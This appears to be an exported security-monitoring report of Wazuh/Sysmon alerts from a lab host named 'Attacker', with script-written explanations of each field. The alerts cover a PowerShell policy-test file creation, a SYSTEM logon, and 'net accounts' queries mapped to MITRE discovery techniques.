rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534526.2228926
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:04.2531417Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  288648
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:42:04.251 ProcessGuid: {94294ddc-be36-680a-0f0c-000000000e00} ProcessId: 10392 Image: C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Windows\SystemTemp\__PSScriptPolicyTest_ux5z0ejr.gmd.ps1 CreationUtcTime: 2025-04-24 22:42:04.251 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:04.251
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be36-680a-0f0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10392
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\SystemTemp\\__PSScriptPolicyTest_ux5z0ejr.gmd.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:42:04.251
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:10.040+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:10.040+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  62
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534530.2231631
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:06.6692041Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43899
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  888
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:31.811+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:31.811+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  17
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534551.2238966
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:29.2811340Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  289977
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:29.257 ProcessGuid: {94294ddc-be55-680a-1a0c-000000000e00} ProcessId: 664 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:29.257
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be55-680a-1a0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:38.927+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:38.927+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  18
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534558.2244195
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:36.4109022Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  290252
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:36.261 ProcessGuid: {94294ddc-be5c-680a-1c0c-000000000e00} ProcessId: 11144 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be55-680a-1a0c-000000000e00} ParentProcessId: 664 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:36.261
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be5c-680a-1c0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  11144
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-be55-680a-1a0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  664
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:39.756+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:39.756+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  19
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534559.2249246
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:37.0200822Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  290311
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

